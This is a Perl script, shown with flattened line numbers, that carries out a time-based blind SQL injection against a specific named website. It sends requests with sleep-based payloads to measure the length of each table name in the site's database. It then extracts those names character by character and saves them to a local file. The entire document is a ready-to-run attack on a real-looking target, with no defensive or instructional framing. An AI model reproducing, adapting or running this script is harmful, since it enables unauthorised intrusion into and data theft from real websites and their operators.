1 use strict; 2 use warnings; 3 use LWP::Simple; 4 5 my %table_and_leng; 6 for(my $count = 0;$count <= 49;$count++){ 7 #print "Test Table: $count "; 8 my $table_length=1; 9 my $swap = $count+1; 10 while($table_length <= 30){ 11 12 print "Test Table($swap), and table_length($table_length) "; 13 my $start_time = time; 14 get("http://www.bjmzdx.org/home/api/detail/cateId/834/id/4698) and ( if(length((select table_name from information_schema.tables where table_schema=database() limit $count,1))=$table_length,sleep(10),1) )-- -.html"); 15 my $end_time = time; 16 my $fish_time = $end_time-$start_time; 17 if($fish_time >= 10){ 18 print "The $swap talbe_length:$table_length "; 19 $table_and_leng{$count} = $table_length; 20 last; 21 } 22 $table_length++; 23 } 24 25 26 } 27 foreach my $keys(sort keys %table_and_leng){ 28 print "$keys => $table_and_leng{$keys} "; 29 } 30 print "All table length is Done, sleep(30)"; 31 sleep(30); 32 33 my %all_tables; 34 for(my $table_count=0;$table_count <=49;$table_count++){ 35 my $table_count_swap = $table_count+1; 36 my @table; 37 for(my $count=1;$count<=$table_and_leng{$table_count}; $count++){ 38 foreach my $char('a'..'z','A'..'Z',0..9,'_','!','@','#','$','%','^','&','*','(',')'){ 39 print "Guess $table_count_swap -> $char "; 40 my $start_time = time; 41 get("http://www.bjmzdx.org/home/api/detail/cateId/834/id/4698) and ( if((substr( (select table_name from information_schema.tables where table_schema=database() limit $table_count,1),$count,1)='".$char."') ,sleep(10),1) )-- -.html"); 42 my $end_time = time; 43 my $fish_time = $end_time-$start_time; 44 if($fish_time >= 10){ 45 print "The Char:$char "; 46 push @table, $char; 47 last; 48 49 } 50 51 } 52 } 53 my $table_swap = join('',@table); 54 55 print "The $table_count_swap is:$table_swap "; 56 $all_tables{$table_count} = $table_swap; 57 } 58 59 open DATA, ">> back.txt" or die "Cannot write to file:$! "; 60 print " ------------------------------------------------------ "; 61 foreach my $table_keys(sort keys %all_tables){ 62 print "$table_keys => $all_tables{$table_keys} "; 63 print DATA "$table_keys $all_tables{$table_keys} "; 64 } 65 print "------------------------------------------------------ "; 66 close DATA; 67 print "All Done, Please Check the file:back.txt in current dir. "; 68 print "Done! ";